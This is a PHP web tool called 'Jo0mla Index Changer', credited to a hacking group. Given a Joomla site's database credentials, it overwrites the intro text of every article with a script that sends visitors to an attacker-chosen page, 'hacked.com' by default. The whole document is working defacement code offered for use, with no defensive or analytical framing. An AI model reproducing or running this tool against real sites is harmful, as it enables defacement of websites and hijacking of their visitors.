</style>
<center><body bgcolor=gray >
<title> Joomla Index </title>
<hr noshade=50>
<hr noshade=50>
<u><font color=white size=6>Jo0mla Index Changer </font></u><br><br>
<font color=black size=6> C0ded By Fisher762</font><br>
<font color=black size=6>InjEctOrS TeaM</font>
<hr noshade=50>
<hr noshade=50>
<u><b><font color=brown size=5>Connection</font></b></u><br><br>
<form method=post >
dbhost : <input name=host value=localhost> dbname :<input name=db ><br><br>
dbuser:<input name=user value=root> Passowrd<input name=pass><br><br>
table_prefix :<input name=prefix value=jos_><br><br>
<hr noshade=50>
<u><b><font color=brown size=5>Change Index</font></b></u><br><br>
Y0ur index Url <input name=index value=http://hacked.com/index.html><br><br>
<input type=submit value=Update name=update>
</form>
<?
//phpbb multi hack
//c0ded by fisher762 from InjEctOrS TeaM
//
This email address is being protected from spambots. You need JavaScript enabled to view it.
//www.TrYaG.Cc/Cc
$host=$_POST['host'];
$user=$_POST['user'];
$db=$_POST['db'];
$pass=$_POST['pass'];
$prefix=$_POST['prefix'];
$index=$_POST['index'];
if ($update){
$con=mysql_connect($host,$user,$pass) or die("<font color=blue size=4>please check your connection information</font>");
$dbs=mysql_select_db($db) or die(mysql_error());
$set=$prefix.content;
$result=mysql_query(" update $set set introtext='<script>location.href=\"$index\"</script>' ") or die(mysql_error());
}
US